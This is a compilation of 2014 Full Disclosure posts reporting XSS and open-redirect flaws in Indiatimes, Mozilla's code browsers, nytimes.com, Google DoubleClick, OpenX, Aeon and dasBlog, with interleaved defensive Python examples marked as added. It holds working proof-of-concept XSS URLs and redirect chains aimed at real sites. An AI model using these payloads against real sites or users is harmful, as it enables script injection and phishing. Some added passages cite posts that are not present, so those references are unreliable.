According to the Indian Readership Survey (IRS) 2012, the Times of India
is the most widely read English newspaper in India with a readership of
7.643 million. This ranks the Times of India as the top English daily in
India by readership. (en.Wikipedia.org http://en.wikipedia.org/)







*Vulnerability description:*


The vulnerability occurs at Indiatimes's URL links. Indiatimes only filters
part of the filenames in its website. All URLs under Indiatimes's
photogallery and top-lists topics are affected.

Indiatimes uses part of the links under the photogallery and top-lists
topics to construct its website content without any checking of those links
at all. This mistake is very common in today's websites. Developers are not
security experts.



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





*POC Codes:*

http://www.indiatimes.com/photogallery/;img src=x
onerror=prompt('justqdjing')

http://www.indiatimes.com/top-lists/;img src=x
onerror=prompt('justqdjing')

http://www.indiatimes.com/photogallery/lifestyle/;img src=x
onerror=prompt('justqdjing')

http://www.indiatimes.com/top-lists/technology/;img src=x
onerror=prompt('justqdjing')





*POC Video:*

https://www.youtube.com/watch?v=EeJWu8_5BKU&feature=youtu.be


*Blog Details:*

http://securityrelated.blogspot.sg/2014/11/two-topics-of-indiatimes-indiatimescom.html






The vulnerabilities were reported to Indiatimes in early September, 2014.
However, they are still unpatched.









Reported by:

Wang Jing, School of Physical and Mathematical Sciences, Nanyang
Technological University, Singapore.

http://www.tetraph.com/wangjing/



[FD] Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities Can be Used by Spammers

2014-11-14 Thread Jing Wang
Google DoubleClick.net(Advertising) System URL Redirection Vulnerabilities
Can be Used by Spammers



Although Google does not include Open Redirect vulnerabilities in its bug
bounty program, its preventive measures against Open Redirect attacks have
been quite thorough and effective to date.

However, Google might have overlooked the security of its DoubleClick.net
advertising system. After some tests, it was found that most of the
redirection URLs within DoubleClick.net are vulnerable to Open Redirect
vulnerabilities. Many redirections are likely to be affected.

These redirections can be easily used by spammers, too.

Some URLs belonging to googleads.g.doubleclick.net are vulnerable to Open
Redirect attacks, too, while Google prevents similar URL redirections
other than googleads.g.doubleclick.net. Attackers can use URLs related to
Google Account to make the attacks more powerful.

Moreover, these vulnerabilities can be used to attack other companies such
as Google, eBay, The New York Times, e.g. by bypassing their Open Redirect
filters (Covert Redirect).




*(1) Background Related to Google DoubleClick.net.*



*(1.1) What is DoubleClick.net?*

DoubleClick is the ad technology foundation to create, transact, and
manage digital advertising for the world's buyers, creators and sellers.
http://www.google.com.sg/doubleclick/



*(1.2) Reports Related to Google DoubleClick.net Used by Spammers*


*(1.2.1)*

Google DoubleClick.net has been used by spammers for a long time. The
following is a report from 2008.

The open redirect had become popular with spammers trying to lure users
into clicking their links, as they could be made to look like safe URLs
within Google's domain.
https://www.virusbtn.com/blog/2008/06_03a.xml?comments


*(1.2.2)*

Mitechmate published a blog related to DoubleClick.net spams in 2014.

"Ad.doubleclick.net is recognized as a perilous adware application that
causes unwanted redirections when surfing on the certain webpages. Actually
it is another browser hijacker that aims to distribute frauds to make
money. Commonly people pick up Ad.doubleclick virus when download softwares,
browse porn site or read spam email attachments. It enters into computer
sneakily after using computer insecurely. Ad.doubleclick.net is not just
annoying, this malware traces users’ personal information, which would be
utilized for cyber criminal."
http://blog.mitechmate.com/remove-ad-doubleclick-net-redirect-virus/


*(1.2.3)*

Malwarebytes posted a news item related to DoubleClick.net malvertising in 2014.

Large malvertising campaign under way involving DoubleClick and Zedo
https://blog.malwarebytes.org/malvertising-2/2014/09/large-malvertising-campaign-under-way-involving-doubleclick-and-zedo/




*(2) DoubleClick.net System URL Redirection Vulnerabilities Details.*

These vulnerabilities can be attacked without user login. Tests were
performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.

One webpage is used for the following tests. The webpage address is
"http://www.tetraph.com/security". We can suppose that this webpage is
malicious.



*(2.1) Vulnerable URLs Related to Googleads.g.Doubleclick.net
http://googleads.g.doubleclick.net/.*


*(2.1.1)*

Some URLs belonging to googleads.g.doubleclick.net are vulnerable to Open
Redirect attacks, while Google prevents similar URL redirections other than
googleads.g.doubleclick.net.


Vulnerable URLs:
http://googleads.g.doubleclick.net/aclk?sa=Lai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYVnum=0sig=AOD64_2petJH0A9Zjj45GN117ocBukiroAclient=ca-pub-0466582109566532adurl=http://www.sharp-world.com/igzo

http://googleads.g.doubleclick.net/aclk?sa=Lai=C-RHnNvn2Uom8LeTaigfjkIHICfLQnccEAAAQASAAUNTx5Pf4_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEhQFP0LHofgVzg8U9Bvwu2_hN9Ow0n2tBH9xjKtngqcF6hgGQpxV6QzMgNxx0_UawPG3-UD097GLLCirbVMl2QxQqa04U3cp4YFgV5dshYbzmqlVVfNn-NuunzLNab6ATE5BUwQ9bgXBOW_qEz8qgbwVOvUJrn1IzL-ymANaKsQLZ9POlkbIe4AQBoAYVnum=0sig=AOD64_3a3m_P_9GRVFc6UIGvnornMcLMoQclient=ca-pub-0466582109566532adurl=http://economics.wj.com


POC:
http://googleads.g.doubleclick.net/aclk?sa=Lai=CWEQH6Q73UqW9CMvMigfdiIGoB9rlksIEAAAQASAAUO7kr-b8_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoEggFP0E-9agyjXkIfjOxmtpPE76hNCBn1in_meKMn53O-8ZFlbxWDgYdaVZQKJza8mIRXw22hWIVMAOJJzq-S6AipWHe9iVZCAAlcHj-gT2B33tD9a2oQrZ61S3-WFh_8T8RFUFnC_PRC35CTFbueQrUYjC-j6ncVXzt_IPXugo5vE-3x4AQBoAYVnum=0sig=AOD64_2petJH0A9Zjj45GN117ocBukiroAclient=ca-pub-0466582109566532adurl=http://www.tetraph.com/security
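
The post above describes redirector URLs being turned into spam hops. The following is an added example (not from the advisory and not Google code) showing the detection side for a site operator: it parses Combined Log Format access-log lines, picks out requests to known redirect endpoints whose destination parameter points away from the site's own domains, and tallies the off-site destinations. The endpoint paths, parameter names, domains and log lines are all constructed for the demo.

```python
"""Find a site's own redirectors being used as off-site hops in access logs.

Added example; endpoint names, parameter names, domains and sample log
lines are constructed, not taken from any real DoubleClick deployment.
"""
import re
from collections import Counter
from urllib.parse import parse_qs, unquote, urlsplit

# Redirect endpoint path -> name of the parameter carrying the destination (assumed).
REDIRECT_PARAMS = {"/aclk": "adurl", "/members/login": "appRedirect", "/en/login": "redirect"}
OWN_DOMAINS = ("example.test",)  # constructed: redirects that stay here are expected

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: two off-site hops, one on-site redirect, one relative target, one junk line.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Nov/2014:10:01:02 +0000] "GET /aclk?sa=L&adurl=http%3A%2F%2Fspam.example%2Fpay HTTP/1.1" 302 0 "http://mail.example.test/inbox" "Mozilla/5.0"',
    '203.0.113.9 - - [14/Nov/2014:10:01:05 +0000] "GET /aclk?sa=L&adurl=https%3A%2F%2Fwww.example.test%2Fproduct HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Nov/2014:10:02:11 +0000] "GET /members/login?appRedirect=%2Fhome HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.5 - - [14/Nov/2014:10:02:40 +0000] "GET /aclk?adurl=//spam.example/pay HTTP/1.1" 302 0 "http://forum.example.test/t/1" "curl/7.35"',
    "garbage line that does not parse",
]


def is_own_host(host: str) -> bool:
    """True for the site's own domains and their subdomains."""
    host = host.lower()
    return any(host == d or host.endswith("." + d) for d in OWN_DOMAINS)


def offsite_target(request_path: str):
    """Return the external destination host if this request redirects off-site, else None."""
    parts = urlsplit(request_path)
    param = REDIRECT_PARAMS.get(parts.path)
    if param is None:
        return None                              # not a redirect endpoint
    values = parse_qs(parts.query).get(param)
    if not values:
        return None                              # no destination supplied
    target = unquote(values[0])                  # tolerate a second layer of encoding
    host = urlsplit(target).hostname             # None for a relative path (stays on site)
    if not host or is_own_host(host):
        return None
    return host.lower()


def scan(log_lines):
    """One finding per parsable request that redirects to an off-site host."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                             # unparsable line: skip, do not crash
        dest = offsite_target(m["path"])
        if dest:
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "referer": m["ref"], "dest": dest})
    return findings


def summary(log_lines) -> Counter:
    """Off-site destination hosts ranked by how often they were hit."""
    return Counter(f["dest"] for f in scan(log_lines))


if __name__ == "__main__":
    for host, hits in summary(SAMPLE_LOG).most_common():
        print(f"{hits:5d}  {host}")
```

The referer field is kept in each finding because, for spam abuse, the interesting signal is a redirect hit whose referer is a webmail or forum page rather than the site's own ad slots.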


[FD] Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net

2014-11-14 Thread Jing Wang
Bypass Google Open Redirect Filter Based on Googleads.g.doubleclick.net
http://googleads.g.doubleclick.net/
-- Google Covert Redirect Vulnerability Based on Googleads.g.doubleclick.net
http://googleads.g.doubleclick.net/



The vulnerability exists at the Logout? page with the continue parameter, i.e.
https://www.google.com/accounts/Logout?service=writely&continue=https://googleads.g.doubleclick.net



The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.



(1) When a user is redirected from Google to another site, Google will
check whether the redirected URL belongs to domains in Google's whitelist
(the whitelist usually contains websites belonging to Google), e.g.
docs.google.com
googleads.g.doubleclick.net

If this is true, the redirection will be allowed.

However, if the URLs in a redirected domain have open URL redirection
vulnerabilities themselves, a user could be redirected from Google to a
vulnerable URL in that domain first and later be redirected from this
vulnerable site to a malicious site. This is as if being redirected from
Google directly.

One of the vulnerable domains is
googleads.g.doubleclick.net (Google's Ad System)




(2) One webpage is used for the following tests. The webpage address is
"http://www.inzeed.com/kaleidoscope". We can suppose that this webpage is
malicious.



Vulnerable URL:
https://www.google.com/accounts/Logout?service=writely&continue=https://google.com/



POC:
https://www.google.com/accounts/Logout?service=wise&continue=http%3A%2F%2Fgoogleads.g.doubleclick.net%2Faclk%3Fsa%3DL%26ai%3DCtHoIVxn3UvjLOYGKiAeelIHIBfLQnccEAAAQASAAUNTx5Pf4_wFgvwWCARdjYS1wdWItMDQ2NjU4MjEwOTU2NjUzMsgBBOACAKgDAaoE5AFP0NHr5cHwFmWgKNs6HNTPVk7TWSV-CDHX83dKdGSWJ2ADoZNIxUHZwjAODRyDY_7nVtpuqSLOTef4xzVxDQ2U22MNbGak33Ur7i2jDB8LdYt9TbC3ifsXmklY5jl3Zpq4_lP7wagVfjt0--tNPPGTR96NGbxgPvfHMq9ZsTXpjhc_lPlnyGjlWzF8yn437iaxhGRwYLt_CymifLO2YaJPkCm9nLpONtUM-mstUSpKQrP2VjjaZkbDtuK0naLLBV37aYEY4TzWQi8fQGN47z4XgpinBCna91zQayZjn2wxccDCl0zgBAGgBhU%26num%3D0%26sig%3DAOD64_3Qi4qG3CRVHRI5AHSkSGuL7HJqSA%26client%3Dca-pub-0466582109566532%26adurl%3Dhttp%3A%2F%2Fwww.inzeed.com%2Fkaleidoscope



POC Video:
https://www.youtube.com/watch?v=btuSq89khcQ&feature=youtu.be



Reporter:
Wang Jing, Mathematics, Nanyang Technological University
http://www.tetraph.com/wangjing





More Details:
http://computerobsess.blogspot.com/2014/11/google-covert-redirect-vulnerability.html

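The post above explains why a whitelist of redirect hosts is not enough when a whitelisted host forwards on a query parameter of its own. The following is an added example, not Google's filter or any code from the advisory: host_allowed() is the naive host check, and redirect_is_safe() additionally walks the target's query string (undoing nested percent-encoding) and rejects a target whose own parameters carry an absolute URL to a host outside the allowlist. The allowlist and all URLs are constructed for the demo.

```python
"""Covert-redirect check: an allowlisted host may itself redirect onward.

Added example; the allowlist and sample URLs are constructed.
"""
from urllib.parse import parse_qsl, unquote, urlsplit

ALLOWED_HOSTS = {"docs.google.com", "googleads.g.doubleclick.net"}  # constructed allowlist
MAX_NESTING = 5  # how many layers of embedded URL / percent-encoding to inspect


def host_allowed(url: str) -> bool:
    """The naive check: only the outer target's host is compared to the allowlist."""
    host = (urlsplit(url).hostname or "").lower()
    return host in ALLOWED_HOSTS


def _fully_unquote(value: str) -> str:
    """Undo repeated percent-encoding until the value stops changing."""
    for _ in range(MAX_NESTING):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def embedded_urls(url: str, depth: int = 0):
    """Yield every absolute URL carried in the query string of url, recursively."""
    if depth >= MAX_NESTING:
        return
    for _, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        candidate = _fully_unquote(value)
        # Scheme-relative "//host" counts too: browsers follow it like https://host.
        if candidate.lower().startswith(("http://", "https://", "//")):
            yield candidate
            yield from embedded_urls(candidate, depth + 1)


def final_hosts(url: str) -> list:
    """Hosts of all URLs nested inside the target's query, outermost first."""
    hosts = []
    for inner in embedded_urls(url):
        host = (urlsplit(inner).hostname or "").lower()
        if host:
            hosts.append(host)
    return hosts


def redirect_is_safe(url: str) -> bool:
    """Hardened check: the target and every URL nested in its query stay on allowed hosts."""
    if not host_allowed(url):
        return False
    return all(host in ALLOWED_HOSTS for host in final_hosts(url))


def continue_target(outer_url: str, param: str = "continue") -> str:
    """Pull the redirect target out of an outer URL's query (e.g. Logout?continue=...)."""
    values = dict(parse_qsl(urlsplit(outer_url).query, keep_blank_values=True))
    return values.get(param, "")


if __name__ == "__main__":
    hop = "https://googleads.g.doubleclick.net/aclk?sa=L&adurl=http%3A%2F%2Fattacker.example%2F"
    print("host allowlist passes:", host_allowed(hop))
    print("nested check passes:  ", redirect_is_safe(hop), final_hosts(hop))
```

The stricter alternative, where the allowlisted service has no open redirector to begin with, is of course preferable; the nested scan is the compensating control when the downstream host cannot be fixed immediately.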


[FD] CVE-2014-7290 Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability

2014-11-14 Thread Jing Wang
CVE-2014-7290  Atlas Systems Aeon XSS (Cross-Site Scripting) Vulnerability


Exploit Title: Atlas Systems Aeon XSS Vulnerability
Product: Aeon
Vendor: Atlas Systems
Vulnerable Versions: 3.6, 3.5
Tested Version: 3.6
Advisory Publication: Nov 12, 2014
Latest Update: Nov 12, 2014
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: CVE-2014-7290
Solution Status: Fixed by Vendor
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]





Advisory Details:

(1) Aeon

Aeon is special collections circulation and workflow automation software
for your special collections library designed by special collections
librarians.

Aeon improves customer service and staff efficiency while providing
unparalleled item tracking, security and statistics.



(2) However, it is vulnerable to XSS Attacks.

(2.1) The first vulnerability occurs at the aeon.dll? page, with the Action
parameter.
(2.2) The second vulnerability occurs at the aeon.dll? page, with the Form
parameter.




Solutions:
2014-09-01: Report vulnerability to Vendor
2014-10-05: Vendor replied with thanks and vendor will change the source
code





References:
http://tetraph.com/security/xss-vulnerability/cve-2014-7290-atlas-systems-aeon-xss-cross-site-scripting-vulnerability/
https://prometheus.atlas-sys.com/display/aeon/Aeon+3.6+Release+Notes
http://cwe.mitre.org
http://cve.mitre.org/



[FD] CVE-2014-7292 Newtelligence dasBlog Open Redirect Vulnerability

2014-10-20 Thread Jing Wang
Exploit Title: Newtelligence dasBlog Open Redirect Vulnerability
Product: dasBlog
Vendor: Newtelligence
Vulnerable Versions: 2.3 (2.3.9074.18820), 2.2 (2.2.8279.16125),
2.1 (2.1.8102.813)
Tested Version: 2.3 (2.3.9074.18820)
Advisory Publication: OCT 15, 2014
Latest Update: OCT 15, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-7292
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]




Advisory Details:

Newtelligence dasBlog ct.ashx is vulnerable to Open Redirect attacks.


dasBlog supports a feature called Click-Through which basically tracks all
links clicked inside your blog posts. It's a nice feature that allows the
blogger to stay informed what kind of content readers like. If
Click-Through is turned on, all URLs inside blog entries will be replaced
with a URL to your blog/ct.ashx?id=<Blog entry ID>&url=<URL-encoded
original URL>, which of course breaks WebSnapr previews.


Web.config code (the handler registration that maps ct.ashx to the
click-through handler):
<add verb="*" path="ct.ashx"
     type="newtelligence.DasBlog.Web.Services.ClickThroughHandler, newtelligence.DasBlog.Web.Services"/>


(1) The vulnerability occurs at the ct.ashx? page, with the url parameter.



Solutions:
2014-10-15 Public disclosure with self-written patch.




References:
http://www.tetraph.com/blog/cves/cve-2014-7292-newtelligence-dasblog-open-redirect-vulnerability/
https://searchcode.com/codesearch/view/8710666/
https://www.microsoft.com/web/gallery/dasblog.aspx
https://dasblog.codeplex.com/releases/view/86033
http://cwe.mitre.org
http://cve.mitre.org/

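Both the dasBlog ct.ashx?id=&url= handler above and the Ad-Manager track-click.php?out= endpoint (CVE-2014-8754, earlier in this thread) are click-tracking redirectors whose destination arrives in the query string, which is what makes them open redirects. The following is an added example, not code from either project, of two defensive designs: redirect by an opaque stored id so no URL travels in the query at all, or, where the URL must stay in the query, sign it with a server-side HMAC so a rewritten url value is refused. The key, the link store and the URLs are constructed.

```python
"""Click-tracking redirectors that cannot be pointed at an arbitrary site.

Added example; SERVER_KEY, the store and all URLs are constructed.
"""
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode, urlsplit

SERVER_KEY = b"constructed-demo-key-rotate-me"  # constructed; load from a secret store in practice
DEFAULT_TARGET = "/"

# Design 1: opaque id -> destination, filled in when the post is rendered.
_LINK_STORE = {}


def register_link(destination: str) -> str:
    """Store the destination server-side and return the tracking link to embed."""
    link_id = secrets.token_urlsafe(8)
    _LINK_STORE[link_id] = destination
    return "/ct.ashx?" + urlencode({"id": link_id})


def resolve_by_id(request_url: str, default: str = DEFAULT_TARGET) -> str:
    """Look the id up; an unknown id gets the default, never a caller-supplied URL."""
    q = parse_qs(urlsplit(request_url).query)
    return _LINK_STORE.get(q.get("id", [""])[0], default)


# Design 2: the destination stays in the query but carries an HMAC over (entry id, url).
def sign(entry_id: str, url: str) -> str:
    msg = f"{entry_id}\n{url}".encode()          # newline keeps id and url from blending
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()


def tracked_link(entry_id: str, url: str) -> str:
    """Tracking link generated by the server when it writes the page."""
    return "/ct.ashx?" + urlencode({"id": entry_id, "url": url, "sig": sign(entry_id, url)})


def resolve_signed(request_url: str, default: str = DEFAULT_TARGET) -> str:
    """Honour the url only if id, url and sig are all present and the MAC verifies."""
    q = parse_qs(urlsplit(request_url).query)
    entry_id = q.get("id", [""])[0]
    url = q.get("url", [""])[0]
    sig = q.get("sig", [""])[0]
    if not (entry_id and url and sig):
        return default                           # unsigned or incomplete request
    if not hmac.compare_digest(sig, sign(entry_id, url)):
        return default                           # url or id was altered after signing
    return url


if __name__ == "__main__":
    link = register_link("https://partner.example/offer")
    print(link, "->", resolve_by_id(link))
    signed = tracked_link("42", "https://partner.example/offer")
    print(signed, "->", resolve_signed(signed))
```

With either design, the click counter is still incremented in the handler; what changes is that the handler decides the destination from server-side state or a verified signature rather than from whatever the query string says.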


[FD] Mozilla mozilla.org Two Sub-Domains ( Cross Reference) XSS Vulnerability ( All URLs Under the Two Domains)

2014-10-20 Thread Jing Wang
Domains:
http://lxr.mozilla.org/
http://mxr.mozilla.org/
(The two domains above are almost the same)




Websites information:
lxr.mozilla.org, mxr.mozilla.org are cross references designed to display
the Mozilla source code. The sources displayed are those that are currently
checked in to the mainline of the mozilla.org CVS server, Mercurial Server,
and Subversion Server; these pages are updated many times a day, so they
should be pretty close to the latest‑and‑greatest. (from Mozilla)




Vulnerability description:
All pages under the following two URLs are vulnerable.
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source


This means all URLs under the above two domains can be used for XSS attacks
targeting Mozilla's users.

Since there is a large number of pages under them, and the contents of the
two domains vary, the vulnerability is very dangerous. Attackers can use
different URLs to design XSS attacks against Mozilla's various classes of
users.

The vulnerability has been reported to bugzilla.mozilla.org. Mozilla is
dealing with this issue.




POCs:
http://lxr.mozilla.org/mozilla-central/source/body
onload=prompt(justqdjing)
http://lxr.mozilla.org/mozilla-central/source/mobile/android/body
onload=prompt(justqdjing)
http://lxr.mozilla.org/mozilla-central/source/Android.mk/body
onload=prompt(tetraph)
http://lxr.mozilla.org/mozilla-central/source/storage/public/mozIStorageBindingParamsArray.idl/body
onload=prompt(tetraph)
http://lxr.mozilla.org/mozilla-central/source/netwerk/protocol/device/AndroidCaptureProvider.cppbody
onload=prompt(tetraph)


http://mxr.mozilla.org/mozilla-central/source/body
onload=prompt(justqdjing)
http://mxr.mozilla.org/mozilla-central/source/webapprt/body
onload=prompt(justqdjing)
http://mxr.mozilla.org/mozilla-central/source/mozilla-config.h.in/body
onload=prompt(justqdjing)
http://mxr.mozilla.org/mozilla-central/source/chrome/nsChromeProtocolHandler.h/body
onload=prompt(tetraph)
http://mxr.mozilla.org/mozilla-central/source/security/sandbox/linux/x86_32_linux_syscalls.h/body
onload=prompt(tetraph)




POC Video:
https://www.youtube.com/user/tetraph




Vulnerability Analysis:
Take the following link as an example,
http://lxr.mozilla.org/mozilla-central/source/chrome/attacktest

We can see that the reflected page contains the following code.
a href=/mozilla-central/source/chrome/%253Cattacktest%253E
attacktest/attacktest
/a

If we insert body onload=prompt(justqdjing) into the URL, the code
can be executed.




The vulnerability can be attacked without user login. My tests were
performed on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.


Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
client-side script into Web pages viewed by other users. A cross-site
scripting vulnerability may be used by attackers to bypass access controls
such as the same origin policy. (From Wikipedia)




Posted By:
Wang Jing, mathematics student from Nanyang Technological University,
Singapore.
http://tetraph.com/wangjing/




More Details:
http://www.tetraph.com/blog/xss-vulnerability/mozilla-mozilla-org-two-sub-domains-cross-reference-xss-vulnerability-all-urls-under-the-two-domains/
http://lxr.mozilla.org/mozilla-central/source
http://mxr.mozilla.org/mozilla-central/source


[FD] CVE-2014-2230 - OpenX Open Redirect Vulnerability

2014-10-16 Thread Jing Wang
Exploit Title: OpenX Open Redirect Vulnerability
Product: OpenX
Vendor:  OpenX
Vulnerable Versions: 2.8.10 and probably prior
Tested Version: 2.8.10
Advisory Publication: OCT 8, 2014
Latest Update:  OCT 8, 2014
Vulnerability Type: Open Redirect [CWE-601]
CVE Reference: CVE-2014-2230
Risk Level: Low
CVSSv2 Base Score: 2.6 (AV:N/AC:H/Au:N/C:N/I:P/A:N)
Solution Status: Solution Available
Credit: Wang Jing [Mathematics, Nanyang Technological University, Singapore]







Vulnerability Details:

OpenX adclick.php and ck.php are vulnerable to Open Redirect attacks.

Source code of adclick.php:
// The destination is read straight from the request (the dest parameter)
// and passed to the redirect helper.
$destination = MAX_querystringGetDestinationUrl($adId[0]);
MAX_redirect($destination);

The MAX_redirect function is below:
function MAX_redirect($url)
{
    // Only javascript: and data: schemes are rejected; any http(s) URL,
    // on any host, passes through to the Location header.
    if (!preg_match('/^(?:javascript|data):/i', $url)) {
        header('Location: '.$url);
        MAX_sendStatusCode(302);
    }
}

The header() function sends a raw HTTP header to a client without any
checking of the $dest parameter at all.


(1) For adclick.php, the vulnerability occurs with dest parameter.


(2) For ck.php, which uses the adclick.php file, the vulnerability occurs
with the _maxdest parameter.








Solutions:
2014-10-12 Public disclosure with self-written patch.


References:
https://github.com/kriwil/OpenX/blob/master/www/index.php
http://www.tetraph.com/blog/cves/cve-2014-2230-openx-open-redirect-vulnerability/
http://www.openx.com
http://cwe.mitre.org
http://cve.mitre.org/

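The MAX_redirect check quoted above is a scheme blocklist: it rejects javascript: and data: and lets any other destination through, which is the same class of weakness as the redirect, appRedirect and TargetResource parameters in the ESPN and PingFederate posts earlier in this thread. The following is an added example, not OpenX, ESPN or PingFederate code: weak_is_safe() reproduces the shape of the blocklist check, and safe_redirect_target() is the hardened replacement, which accepts only same-site relative paths or exact allowlisted hosts and handles the URL shapes (scheme-relative, backslash, userinfo, lookalike host, CR/LF) that defeat naive host checks. The allowlist and inputs are constructed.

```python
"""Weak versus hardened validation of a redirect-target parameter.

Added example; ALLOWED_HOSTS and the sample inputs are constructed.
"""
import re
from urllib.parse import urlsplit, urlunsplit

ALLOWED_HOSTS = {"www.example.test", "login.example.test"}  # constructed allowlist
DEFAULT_TARGET = "/"


def weak_is_safe(url: str) -> bool:
    """Scheme blocklist only: an absolute URL to any other site passes."""
    return re.match(r"^(?:javascript|data):", url, re.IGNORECASE) is None


def safe_redirect_target(url: str, default: str = DEFAULT_TARGET) -> str:
    """Return a destination that is safe to place in a Location header."""
    if not url or any(c in url for c in "\r\n\x00"):
        return default                          # header injection or NUL: refuse outright
    url = url.strip().replace("\\", "/")        # browsers treat "/\host" like "//host"
    parts = urlsplit(url)
    if url.startswith("/") and not url.startswith("//"):
        # Same-site relative path: keep path and query, drop everything else.
        return urlunsplit(("", "", parts.path or "/", parts.query, ""))
    if parts.scheme.lower() not in ("http", "https"):
        return default                          # "//host", ftp:, javascript:, data: ...
    if parts.username or parts.password:
        return default                          # "https://allowed@other" style tricks
    try:
        port = parts.port                       # raises ValueError on a malformed port
    except ValueError:
        return default
    if port not in (None, 80, 443):
        return default                          # unexpected port on an allowed host
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_HOSTS:
        return default                          # exact match only: no suffix/prefix games
    return url


if __name__ == "__main__":
    for candidate in ("/dashboard?tab=1", "//attacker.example/", "http://attacker.example/",
                      "https://login.example.test/next", "https://www.example.test@attacker.example/"):
        print(f"{candidate!r:50} weak={weak_is_safe(candidate)!s:5} hardened={safe_redirect_target(candidate)!r}")
```

The important design choice is the fallback: an unacceptable target is replaced by a fixed default rather than reported back to the user, so the parameter can never steer the response, and exact host matching avoids the usual endswith() mistakes.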


[FD] New York Times nytimes.com Page Design XSS Vulnerability (Almost all Article Pages Before 2013 are Affected)

2014-10-16 Thread Jing Wang
New York Times nytimes.com Page Design XSS Vulnerability (Almost all
Article Pages Before 2013 are Affected)


Domain:
http://www.nytimes.com/



Vulnerability Description:
The vulnerability occurs at New York Times’s URLs. Nytimes (short for New
York Times) uses part of the URLs to construct its pages. However, it seems
that Nytimes did not filter the content used for the construction at all
before 2013.

Based on Nytimes’s design, almost all URLs before 2013 are affected (all
pages of articles). In fact, all article pages that contain a “PRINT” button,
“SINGLE PAGE” button, “Page *” button or “NEXT PAGE” button are affected.

Nytimes has changed this mechanism since 2013. It decodes the URLs sent to
its server. This makes the mechanism much safer now.

However, all URLs before 2013 are still using the old mechanism. This means
almost all article pages before 2013 are still vulnerable to XSS attacks. I
guess the reason Nytimes does not filter URLs before is cost. It costs too
much (money & human capital) to change the database of all posted articles
before.




Living POCs:
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/“img
src=x onerror=prompt(‘justqdjing’)
http://www.nytimes.com/2011/01/09/travel/09where-to-go.html/“img src=x
onerror=prompt(‘justqdjing’)?pagewanted=all_r=0
http://www.nytimes.com/2010/12/07/opinion/07brooks.html/“img src=x
onerror=prompt(‘justqdjing’)
http://www.nytimes.com/2009/08/06/technology/06stats.html/“img src=x
onerror=prompt(‘justqdjing’)
http://www.nytimes.com/2008/07/09/dining/091crex.html/“img src=x
onerror=prompt(‘justqdjing’)
http://www.nytimes.com/2007/11/14/opinion/lweb14brain.html/“img src=x
onerror=prompt(‘justqdjing’)




POC Video:
https://www.youtube.com/user/tetraph




Vulnerability Analysis:
Take the following link as an example,
http://www.nytimes.com/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/
“vulnerabletoattack

We can see that the reflected page contains the following code. All of
these links are vulnerable.

li class=”print”
a
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”vulnerabletoattack?pagewanted=print”Print/testtesttest?pagewanted=print”/a
/li

li class=”singlePage”
a
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”testtesttest?pagewanted=all”
Single Page/vulnerabletoattack?pagewanted=all”/a
 /li

li a onclick=”s_code_linktrack(‘Article-MultiPagePageNum2′);”
title=”Page 2″
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”vulnerabletoattack?pagewanted=2″2/testtesttest?pagewanted=2″/a
/li

li a onclick=”s_code_linktrack(‘Article-MultiPagePageNum3′);”
title=”Page 3″
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”vulnerabletoattack?pagewanted=3″3/testtesttest?pagewanted=3″/a
/li

a class=”next” onclick=”s_code_linktrack(‘Article-MultiPage-Next’);”
title=”Next Page”
href=”/2012/02/12/sunday-review/big-datas-impact-in-the-world.html/”vulnerabletoattack?pagewanted=2″Next
Page »/testtesttest?pagewanted=2″/a





The vulnerability can be attacked without user login. Tests were performed
on Firefox (26.0) in Ubuntu (12.04) and IE (9.0.15) in Windows 7.





Cross-site scripting (XSS) is a type of computer security vulnerability
typically found in Web applications. XSS enables attackers to inject
